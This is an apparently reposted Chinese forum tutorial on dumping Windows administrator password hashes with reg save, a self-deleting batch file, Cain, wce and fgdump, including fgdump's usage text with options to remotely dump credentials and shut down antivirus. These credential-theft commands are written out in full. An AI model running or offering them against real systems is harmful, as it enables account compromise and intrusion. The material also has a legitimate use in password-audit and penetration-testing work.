抓取管理员hash值(哈希)的另类方法
今天抓hash的时候发现GetHashes.exe不好使..另外又测试了几个也都不好用... <br />不同版本的Windows的hash获取方法不一样.<div>用到的工具有pwdump7.exe、GetHashes.exe、SAMInside.exe、LC5、Cain、Proactive Password Auditor、Ophcrack.</div>
<div> 于是百度了一些资料穿上来!希望大家能学习一下。</div>
<div> ====================================第1种===========================================</div>
<div> 使用工具 cain、cmd、wce1.2等</div>
<div> 首先使用通用方法抓取HASH</div>
<div> 使用命令先保存一份需要的信息。</div>
<div> reg save hklm\sam sam.hive</div>
<div> reg save hklm\system system.hive</div>
<div> reg save hklm\security security.hive</div>
<div> (这三个文件我找了个批处理,这样比较方便)</div>
<div> ==========================</div>
<div> @echo off</div>
<div>reg save hklm\sam sam.hive</div>
<div>reg save hklm\system system.hive</div>
<div>reg save hklm\security security.hive</div>
<div>del %0</div>
<div> ===========================</div>
<div> 保存为批处理文件,直接在服务器上运行。</div>
<div> 就会在批处理所在目录生成这三个文件</div>
<div> 和下面的效果一样,只不过简化了步骤</div>
<div><img style="WIDTH: 498px; CURSOR: pointer" alt="\" border="0" src="https://img.jbzj.com/do/uploads/allimg/120511/1053460.jpg" /></div>
<div>
<div>然后我们使用CAIN打开保存到的system.hive 和security.hive两个文件。我是在虚拟机里面操作就直接在虚拟机里面搞了。。大家在服务器上搞可以下载到本地。</div>
<div> 打开CAIN选择LSA Secrets然后打开system.hive 和security.hive两个文件</div>
<div><img style="WIDTH: 451px; CURSOR: pointer" alt="\" border="0" src="https://img.jbzj.com/do/uploads/allimg/120511/1053461.jpg" /></div>
<div>
<div>加载后我们可以看到一些信息,这些信息可能会有明文密码,我这里是没有的。</div>
<div><img style="WIDTH: 388px; CURSOR: pointer" alt="\" border="0" src="https://img.jbzj.com/do/uploads/allimg/120511/1053462.jpg" /></div>
<div>
<div>如果没有我们就需要抓HASH了。点击CAIN的Cracker选项卡,加载sam.hive文件。</div>
<div><img style="WIDTH: 450px; CURSOR: pointer" alt="\" border="0" src="https://img.jbzj.com/do/uploads/allimg/120511/1053463.jpg" /></div>
<div><img style="WIDTH: 452px; CURSOR: pointer" alt="\" border="0" src="https://img.jbzj.com/do/uploads/allimg/120511/1053464.jpg" /></div>
<div>
<div>拿到HASH了,www.jb51.net 下面就是破解,用工具自带的破解试试密码出来了,我设置的123456</div>
<div><img style="WIDTH: 443px; CURSOR: pointer" alt="\" border="0" src="https://img.jbzj.com/do/uploads/allimg/120511/1053465.jpg" /></div>
<div>
<div>我们也可以使用彩虹表来破解</div>
<div>下面我们使用wce来搞。。这个工具是渗透利器哈~~具体介绍大家自己百度去。</div>
<div><img style="WIDTH: 482px; CURSOR: pointer" alt="\" border="0" src="https://img.jbzj.com/do/uploads/allimg/120511/1053466.jpg" /></div>
<div>
<div>从帮助来看我们可以使用-l参数查看NTML hash</div>
<div> 我们还可以用-s参数来改HASH值如图</div>
<div><img style="WIDTH: 482px; CURSOR: pointer" alt="\" border="0" src="https://img.jbzj.com/do/uploads/allimg/120511/1053467.jpg" /></div>
<div>
<div>从图中我们可以看到最后一位的HASH我从4修改到了5</div>
<div><img style="WIDTH: 488px; CURSOR: pointer" alt="\" border="0" src="https://img.jbzj.com/do/uploads/allimg/120511/1053468.jpg" /></div>
<div>
<div>====================================第2种===========================================</div>
<div>fgdump 可以远程抓Hash的工具</div>
<div> 作者:TheLostMind</div>
<div>一直都是本地抓,今天上SamInside论坛看到一个开源的工具,fgdump,可以远程抓。</div>
<div> http://swamp.foofus.net/fizzgig/fgdump/fgdump-usage.htm</div>
<div> fgDump 2.1.0 - fizzgig and the mighty group at foofus.net</div>
<div>Written to make j0m0kun's life just a bit easier</div>
<div>Copyright(C) 2008 fizzgig and foofus.net</div>
<div>fgdump comes with ABSOLUTELY NO WARRANTY!</div>
<div>This is free software, and you are welcome to redistribute it</div>
<div>under certain conditions; see the COPYING and README files for</div>
<div>more information.</div>
<div>Usage:</div>
<div>fgdump [-?][-t][-c][-w][-s][-r][-v][-k][-o][-a][-O 32|64][-l logfile][-T threads] [{{-h Host | -f filename} -u Username -p Password | -H filename}]</div>
<div>where Username and Password have administrator credentials</div>
<div>-? displays help (you're looking at it!)</div>
<div>-t will test for the presence of antivirus without actually running the password dumps</div>
<div>-c skips the cache dump</div>
<div>-w skips the password dump</div>
<div>-s performs the protected storage dump</div>
<div>-r forgets about existing pwdump/cachedump files. The default behavior is to skip a host if these files already exist.</div>
<div>-v makes output more verbose. Use twice for greater effect</div>
<div>-k keeps the pwdump/cachedump going even if antivirus is in an unknown state</div>
<div>-l logs all output to logfile</div>
<div>-T runs fgdump with the specified number of parallel threads</div>
<div>-h is the name of the single host to perform the dumps against</div>
<div>-f reads hosts from a line-separated file</div>
<div>-H reads host:username:password from a line-separated file (per-host credentials)</div>
<div>-o skips pwdump history dumps</div>
<div>-a will not attempt to detect or shut down antivirus, even if it is present</div>
<div> -O manually sets whether the target is a 32- or 64-bit OS. Note that this applies to all hosts specified.</div>
<div>** As of version 1.4.0, you can run fgdump with no parameters to dump the local box (no impersonation or binding)</div>
<div>测试了一下,很不错,简单翻译了一下帮助。</div>
<div> 用法:</div>
<div>fgdump [-?][-t][-c][-w][-s][-r][-v][-k][-o][-a][-O 32|64][-l logfile][-T threads] [{{-h Host | -f filename} -u</div>
<div> Username -p Password | -H filename}]</div>
<div> 用户名和密码要求要有管理员资格</div>
<div> -? 显示帮助</div>
<div>-t 测试当前的杀毒软件,并不是真正的转储密码</div>
<div>-c 跳过缓存转储</div>
<div>-w 跳过密码转储</div>
<div>-s 执行保护存贮转储</div>
<div>-r 忽略现存的pwdump/cachedump文件。默认的行为是跳过存在这些文件的主机。</div>
<div>-v 详细输出. 使用两次能获得更为详细的输出</div>
<div>-k 即使不知道杀毒软件的状态也继续执行pwdump/cachedump(进行密码转储)</div>
<div>-l 记录所有输出到日志文件</div>
<div>-T 使用指定数量的线程执行此程序</div>
<div>-h 需要执行密码转储的单个目标主机</div>
<div>-f 从用行分隔的文件中读取主机列表</div>
<div>-H 从用行分隔的文件中读取 主机名:用户名:密码</div>
<div>-o 跳过转储历史密码</div>
<div>-a 试图检测或关闭杀毒软件,即使杀毒软件正在运行</div>
<div> -O 手工设置远程主机是32位操作系统还是64位操作系统。 注意:这项操作应用到所有指定的主机。</div>
<div> ** 使用1.4.0,你可以直接运行此程序,不需要带参数,来转储本机密码</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
頁:
[1]